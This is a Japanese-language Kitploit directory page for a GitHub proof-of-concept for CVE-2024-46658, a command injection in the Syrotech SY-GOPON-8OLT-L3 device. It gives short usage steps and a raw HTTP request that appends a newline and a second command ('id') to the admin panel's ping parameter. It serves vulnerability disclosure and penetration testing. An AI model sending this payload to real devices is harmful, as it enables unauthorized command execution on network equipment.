Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-46658 — Syrotech SY-GOPON-8OLT-L3におけるコマンドインジェクション脆弱性の概念実証エクスプロイト。HTTPリクエスト操作を介して任意のコマンド実行を可能にします。 | Kitploit
ツール/GitHubGitHub/jackalkarlos/cve-2024-46658
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubjackalkarlos/cve-2024-46658

CVE-2024-46658

Syrotech SY-GOPON-8OLT-L3におけるコマンドインジェクション脆弱性の概念実証エクスプロイト。HTTPリクエスト操作を介して任意のコマンド実行を可能にします。

リポジトリを見る
131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-46658

Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 コマンドインジェクションの脆弱性

使い方

1- スクリプト内のURLを編集します。

2- スクリプト内のCookie_Loginの値を編集します。

3- スクリプトを実行すると、コマンドを実行できるようになります。

脆弱性の詳細

GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1

通常、管理パネルではpingコマンドのみが実行を許可されています。

プロキシでリクエストを傍受し、commandパラメータの末尾に改行バイトを追加して実行したいコマンドを入力すると、別のコマンドを実行できます。

作者

Mehmet Demir

ツールをダウンロード